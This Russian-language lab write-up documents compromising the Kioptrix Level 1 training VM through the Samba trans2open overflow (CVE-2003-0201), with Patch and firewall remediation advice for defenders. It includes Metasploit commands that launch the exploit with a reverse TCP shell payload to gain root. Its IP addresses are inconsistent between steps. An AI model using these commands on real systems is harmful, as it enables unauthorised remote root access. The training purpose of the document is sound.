Kioptrix Level 1: Полноспектральный аудит уязвимостей и эксплуатация
🏛️ Профессиональная цель
Целью было выполнить структурированное тестирование на проникновение в среде Kioptrix Level 1 для достижения полного компрометации 'root' и документирования технических стратегий устранения, подходящих как для операций Red, так и Blue team.
🏗️ Воспроизведение среды (Аппаратные особенности)
Современные настройки виртуализации по умолчанию часто не работают на устаревших ядрах 2010 года. Для успешной загрузки и настройки сети этой машины потребовались следующие специфические архитектурные конфигурации:
- Подтип ОС: Linux / Red Hat (32-бит).
- Архитектура хранения: Переключено с SATA на IDE Controller для поддержки устаревшего .vmdk жесткого диска.
- Сетевой протокол: Настроен как PCI FAST-III с адаптером Host-only для обеспечения внутренней связи с атакующей машиной Kali Linux.
⚔️ Анализ атак (Путь Red Team)
Эксплуатация следовала жизненному циклу от ручной разведки до эксплуатации:
1. Обнаружение и разведка
- Netdiscover: Использован
netdiscover -r 192.168.184.4 для определения IP-адреса цели.
- Сканирование Nmap: Обнаружены службы, включая SSH (22), HTTP (80), RPC (111) и NetBIOS-SSN (139). Samba 2.2.1a была отмечена как основная точка входа.
2. Эксплуатация (Samba trans2open)
- Уязвимость: CVE-2003-0201 (Переполнение кучи).
- Сопоставление MITRE ATT&CK: - Тактика: Повышение привилегий (TA0004)
- Техника: Эксплуатация для повышения привилегий (T1068)
- Протокол Metasploit:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Результат: Успешно запущена обратная оболочка. Команда
whoami вернула root.
🛡️ Защитное устранение (Путь Blue Team)
Для защиты корпоративной среды обязательны следующие стратегии управления уязвимостями (VM):
- Протокол обновления: Обновите Samba до последней поддерживаемой версии (Samba 4.x). Уязвимость в функции
call_trans2open эффективно устранена во всех современных версиях.
- Укрепление сети: Разверните межсетевые экраны на узлах, чтобы ограничить порты 139 и 445 только доверенными внутренними подсетями.
- Стратегия роли VM: Это устранение попадает под стандартные циклы управления уязвимостями в рабочее время, обеспечивая стабильность инфраструктуры.
📝 Технические доказательства и ручные журналы
Следующие изображения документируют живую ручную разведку и выполнение в терминале:
Обнаружение цели и архитектурные заметки


Доказательство root-доступа (снимок терминала)
Root Shell Evidence